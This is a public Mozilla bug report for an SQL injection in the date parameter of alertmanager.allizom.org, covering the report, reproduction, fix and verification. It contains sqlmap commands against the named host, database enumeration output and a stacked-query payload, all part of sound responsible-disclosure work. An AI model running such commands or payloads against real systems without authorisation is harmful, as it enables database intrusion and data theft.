Closed Bug 1293111 Opened 8 years ago Closed 8 years ago

SQL injection vulnerability on alertmanager.allizom.org

Categories

(Websites :: Other, defect)

Product:
Websites
Component:
Other
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: griffin.francis.1993, Unassigned)

Details

(Keywords: reporter-external, sec-high, wsec-sqli) 

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Steps to reproduce:

Hello, The URL  alertmanager.allizom.org/data/setadetails/?date= is vulnerable to SQLI via the date parameter. To validate this I issued the following command to SQLMAP:

C:\Users\Griffin\Desktop\sqlmap>sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=" --random-agent --tamper=space2comment --schema --threads=10

The following schema was returned (I did not proceed from here)

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.11
[16:17:29] [INFO] enumerating database management system schema
[16:17:29] [INFO] fetching database names
[16:17:29] [INFO] fetching number of databases
[16:17:29] [INFO] resumed: 8
[16:17:29] [INFO] resumed: information_schema
[16:17:29] [INFO] resumed: alertbot
[16:17:29] [INFO] resumed: alerts
[16:17:29] [INFO] resumed: mysql
[16:17:29] [INFO] resumed: ouija
[16:17:29] [INFO] resumed: ouijatest
[16:17:29] [INFO] resumed: performance_schema
[16:17:29] [INFO] resumed: test



Actual results:

The date parameter does not properly sanitize against malicious input.


Expected results:

The above information should not have been returned back within the SQLMAP response.
Griffin: thanks, the above seems pretty self-describing.  I'll do some testing and see how bad it is.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Griffin: I tried briefly to confirm your observations using the latest sqlmap (1.0.8.15#dev) with the above parameters.  It didn't return the same results as you have above.  Would you mind sharing exactly what version of sqlmap you're using and whether the above parameters where the exact parameters used to enumerate the DB list?
Flags: needinfo?(griffin.francis.1993)
Here are my results output from a slightly more tuned scan, just for transparency...

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql
         _
 ___ ___| |_____ ___ ___  {1.0.8.15#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:38:32

[20:38:32] [INFO] loading tamper script 'space2comment'
[20:38:32] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3'
[20:38:32] [INFO] testing connection to the target URL
[20:38:32] [INFO] testing if the target URL is stable
[20:38:33] [INFO] target URL is stable
[20:38:33] [INFO] testing if GET parameter 'date' is dynamic
[20:38:33] [WARNING] GET parameter 'date' does not appear dynamic
[20:38:33] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[20:38:33] [INFO] testing for SQL injection on GET parameter 'date'
[20:38:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:38:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[20:38:36] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)
[20:38:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:38:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:38:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:38:52] [WARNING] GET parameter 'date' is not injectable
[20:38:52] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 20:38:52
Looks like there may have been a typo above.  Corrected URL.

http://alertmanager.allizom.org/data/setadetails/?date=
Ok, using the newly corrected URL, I was able to confirm this SQLi vulnerability.

...SNIP...
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: date (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: date=';SELECT SLEEP(5)#
---
[21:11:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:11:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL > 5.0.11
...SNIP...
Flags: needinfo?(griffin.francis.1993)
jmaher: I see you're one the more prominent developers of alertmanager.  Could you please take a look at this first thing tomorrow and see if we can get a code fix.
Flags: needinfo?(jmaher)
Thanks for the confirmation Jonathan. Much appreciated.
Summary: SQLI on alertmanager.allizom.org → SQL injection vulnerability on alertmanager.allizom.org
Flags: sec-bounty?
updated:
https://github.com/mozilla/ouija/commit/8ab444e1c80e603758759c1c71417b0a53ede131

this is on the live server, thanks for pointing this out.
Flags: needinfo?(jmaher)
I also worked with jmaher on this and did a second pass with sqlmap.  Overall result is that it seems fixed.

Here's the results of my sqlmap verification:

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/setadetails/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql
         _
 ___ ___| |_____ ___ ___  {1.0.8.15#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:36:25

[12:36:25] [INFO] loading tamper script 'space2comment'
[12:36:25] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre'
[12:36:25] [INFO] testing connection to the target URL
[12:36:26] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:36:26] [INFO] testing if the target URL is stable
[12:36:27] [INFO] target URL is stable
[12:36:27] [INFO] testing if GET parameter 'date' is dynamic
[12:36:27] [WARNING] GET parameter 'date' does not appear dynamic
[12:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[12:38:08] [INFO] testing for SQL injection on GET parameter 'date'
[12:38:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:38:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:15] [INFO] testing 'MySQL inline queries'
[12:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:38:15] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)                                                        
[12:38:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:38:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:38:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:39:06] [WARNING] GET parameter 'date' is not injectable
[12:39:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 12:39:06
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
jmaher: many thanks on the quick turn around for this!
Griffin: we discussed with the bounty team just now, even though this site isn't enrolled in the bounty program and a compromise of the service wouldn't be critical based on what it's holding and where it lives, we believe the severity of the bug is sufficient to imply RCE or service compromise impact and thus we're going to reward a bounty in this case.
Flags: sec-bounty? → sec-bounty+
Thanks for the turn around on this report. It is much appreciated.
Making bug public, since it's fixed.
Group: websites-security
You need to log in before you can comment on or make changes to this bug.